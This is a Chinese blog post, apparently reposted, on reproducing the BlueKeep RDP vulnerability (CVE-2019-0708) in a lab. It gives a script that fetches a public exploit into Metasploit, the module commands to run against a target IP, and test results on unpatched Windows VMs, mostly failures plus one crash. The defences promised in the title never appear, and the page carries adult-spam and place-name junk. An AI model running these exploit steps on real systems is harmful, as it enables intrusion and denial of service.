91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

CVE-2019-0708復現和防御手段是什么

發布時間:2021-12-22 21:02:31 來源:億速云 閱讀:191 作者:柒染 欄目:網絡管理

CVE-2019-0708復現和防御手段是什么,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

一、漏洞描述

Windows系列服務器于2019年5月15號,被爆出高危漏洞,該漏洞影響范圍較廣如:windows2003、windows2008、windows2008 R2、windows xp系統都會遭到攻擊,該服務器漏洞利用方式是通過遠程桌面端口3389,RDP協議進行攻擊的。

二、漏洞利用方法

為了測試方便,直接扔出自編的一個腳本,按下面步驟做就可以,使用kali linxu系統。

1.     建立一個腳本文件*.sh,同時chmod +x *.sh付給它可執行屬性

2.     直接復制如下代碼到*.sh,然后./*.sh運行即可準備好攻擊環境(注意:腳本幫助更新了MSF,這一步是必須的!不然框架加載不進來)

#Update your MSF
apt-get update
apt-get install
metasploit-framework
#Download cve-2019-0708
git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git
#Mkdir for cve
mkdir –p /usr/share/metasploit-framework/lib/msf/core/exploit/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/
mkdir –p
/usr/share/metasploit-framework/modules/exploits/windows/rdp/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
#Copy .rb to target dir
cd cve_2019_0708_bluekeep_rce/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

CVE-2019-0708下載后包含2個模塊,一個掃描模塊cve_2019_0708_bluekeep,一個攻擊模塊cve_2019_0708_bluekeep_rce,直接使用攻擊模塊就可以。

CVE-2019-0708復現和防御手段是什么

3.     繼續如下操作即可開始測試

msfconsole

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhosts 192.168.80.111(目標IP)

set target 3(目標環境,具體用哪個看下面第二個圖,或者直接在模塊下輸入info就行)

run

CVE-2019-0708復現和防御手段是什么

CVE-2019-0708復現和防御手段是什么

        三、開始測試(系統都是虛擬機)

       1.       測試winxp-sp3

       可以,XP巋然不動,穩如泰山!雖然沒打幾個補丁,但是一點都不虛!

CVE-2019-0708復現和防御手段是什么

CVE-2019-0708復現和防御手段是什么

2.       測試win7-x64-sp1

     穩如……難道這就是現實?一點也打不動……

CVE-2019-0708復現和防御手段是什么CVE-2019-0708復現和防御手段是什么

CVE-2019-0708復現和防御手段是什么

3.       測試server2008-x64-R2-SP1

            可以的,不但沒有拿到shell,還打藍屏了,換了一個參數,打成了無響應……

CVE-2019-0708復現和防御手段是什么CVE-2019-0708復現和防御手段是什么CVE-2019-0708復現和防御手段是什么

4.       測試server-2003-企業版

     打不動……好像知道了一點事情……

CVE-2019-0708復現和防御手段是什么

CVE-2019-0708復現和防御手段是什么

5.       測試win10-x64專業版

      當然要拿自己的機器試一下,一樣沒打補丁,完全打不動。

CVE-2019-0708復現和防御手段是什么CVE-2019-0708復現和防御手段是什么

四、 寫在最后

       本次測試雖然沒有成功復現,但是折騰之后想起來一個詞“水土不服”,曾經折騰過很多滲透測試,都是因為水土不服——只有找到特定的系統,做特定的配置才能復現,有的甚至要配置特定的系統語言。

       其實本次CVE也要在2008R2上配置一些東西才能通過,但是距離真實環境太遠,就沒去配置,原汁原味測試一下就好啦,還有……滲透測試建議不要用這個,藍屏誰也受不了!

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

庆城县| 娱乐| 泰兴市| 晋州市| 新干县| 滨海县| 酒泉市| 佳木斯市| 盐池县| 历史| 惠东县| 永康市| 富裕县| 苏尼特右旗| 南开区| 民丰县| 屏边| 甘洛县| 泌阳县| 恭城| 陆丰市| 且末县| 扬中市| 永安市| 昭觉县| 大关县| 西畴县| 芒康县| 通江县| 剑河县| 阳江市| 玉山县| 衡阳县| 谷城县| 霍州市| 宁晋县| 黄平县| 新郑市| 清水河县| 山阴县| 正安县|